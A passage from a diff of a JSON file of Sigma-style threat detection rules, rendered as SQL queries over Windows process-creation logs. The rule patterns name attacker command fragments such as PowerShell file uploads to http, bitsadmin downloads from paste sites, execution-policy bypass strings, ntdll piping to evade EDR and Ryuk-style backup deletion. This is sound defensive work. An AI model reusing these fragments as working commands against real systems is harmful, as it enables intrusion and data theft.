= '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' 
ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_plink_port_forwarding.yml" + "filename": "proc_creation_win_powershell_public_folder.yml" }, { - "title": "PUA - NirCmd Execution As LOCAL SYSTEM", - "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", - "status": "test", - "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "DLL Sideloading by Microsoft Defender", + "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "status": "experimental", + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR 
NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nircmd_as_system.yml" + "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" }, { - "title": "HackTool - SysmonEOP Execution", - "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", - "status": "experimental", - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", + "id": "52ff7941-8211-46f9-84f8-9903efb7077d", + "status": "test", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", "author": "Florian Roth (Nextron Systems)", "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1134.004" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR 
OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sysmoneop.yml" + "filename": "proc_creation_win_hktl_selectmyparent.yml" }, { - "title": "HackTool - RedMimicry Winnti Playbook Execution", - "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "title": "Renamed SysInternals DebugView Execution", + "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", - "author": "Alexander Rausch", + "description": "Detects suspicious renamed SysInternals DebugView execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = 
'4688' AND Channel = 'Security') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" + "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" }, { - "title": "HackTool - PurpleSharp Execution", - "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", + "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "status": "test", - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", + "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1587", - "attack.resource_development" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" + "filename": "proc_creation_win_lolbin_manage_bde.yml" }, { - "title": "Potential Ryuk Ransomware Activity", - "id": 
"c37510b8-2107-4b78-aa32-72f251e7a844", - "status": "stable", - "description": "Detects Ryuk ransomware activity", - "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", + "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "status": "experimental", + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_malware_ryuk.yml" + "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" }, { - "title": "Potential Baby Shark Malware Activity", - "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", - "status": "test", - "description": "Detects activity that could be related to Baby Shark malware", - "author": "Florian Roth (Nextron Systems)", - "tags": [ + "title": "Wscript Shell Run In CommandLine", + "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "status": "experimental", + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.discovery", - "attack.t1012", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1218.005" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Rare legitimate inline scripting by some administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_babyshark.yml" + "filename": "proc_creation_win_script_wscript_shell_cli.yml" }, { - "title": "Audit Policy Tampering Via Auditpol", - "id": "0a13e132-651d-11eb-ae93-0242ac130002", - "status": "test", - "description": "Threat actors can use auditpol 
binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "title": "Potential Process Injection Via Msra.EXE", + "id": "744a188b-0415-4792-896f-11ddb0588dbc", + "status": "experimental", + "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", + "author": "Alexander McDonald", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1055" ], "falsepositives": [ - "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" + "Legitimate use of Msra.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_auditpol_susp_execution.yml" - }, - { - "title": "Potential QBot Activity", - "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "status": "stable", - "description": "Detects potential QBot activity by looking for process executions used previously by QBot", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.005" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND 
NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\route.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_qbot.yml" + "filename": "proc_creation_win_msra_process_injection.yml" }, { - "title": "Add SafeBoot Keys Via Reg Utility", - "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", + "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Some legitimate apps use this, but limited." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_add_safeboot.yml" + "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" }, { - "title": "TropicTrooper Campaign November 2018", - "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", 
- "status": "stable", - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "author": "@41thexplorer, Microsoft Defender ATP", + "title": "Suspicious Encoded PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "status": "test", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "tags": [ "attack.execution", "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\' OR CommandLine LIKE '% BA^J e-%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '% -ExecutionPolicy remotesigned %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_tropictrooper.yml" + "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" }, { - "title": "Suspicious Debugger Registration Cmdline", - "id": "ae215552-081e-44c7-805f-be16f975c8a2", - "status": "test", - "description": "Detects the registration of a debugger for a 
program that is available in the logon screen (sticky key backdoor).", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Exchange PowerShell Snap-Ins Usage", + "id": "25676e10-2121-446e-80a4-71ff8506af47", + "status": "experimental", + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", + "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_registry_install_reg_debugger_backdoor.yml" + "filename": "proc_creation_win_powershell_snapins_hafnium.yml" }, { - "title": "Potential CVE-2021-40444 Exploitation Attempt", - "id": "894397c6-da03-425c-a589-3d09e7d1f750", + "title": "HackTool - Koadic Execution", + "id": "5cddf373-ef00-4112-ad72-960ac29bac34", "status": "test", - "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", - "author": "Florian Roth (Nextron Systems), @neonprimetime", + "description": "Detects command line parameters used by Koadic hack tool", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444.yml" + "filename": "proc_creation_win_hktl_koadic.yml" }, { - "title": "Suspicious Shells Spawned by Java", - "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", - "status": "experimental", - "description": "Detects suspicious shell spawned from Java host process (e.g. 
log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "title": "NtdllPipe Like Activity Execution", + "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "status": "test", + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_susp_child_process.yml" + "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" }, { - "title": "Suspicious Serv-U Process Pattern", - "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", - "status": "experimental", - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Service Path Modification", + "id": "138d3531-8793-4f50-a2cd-f291b2863d78", + "status": "test", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 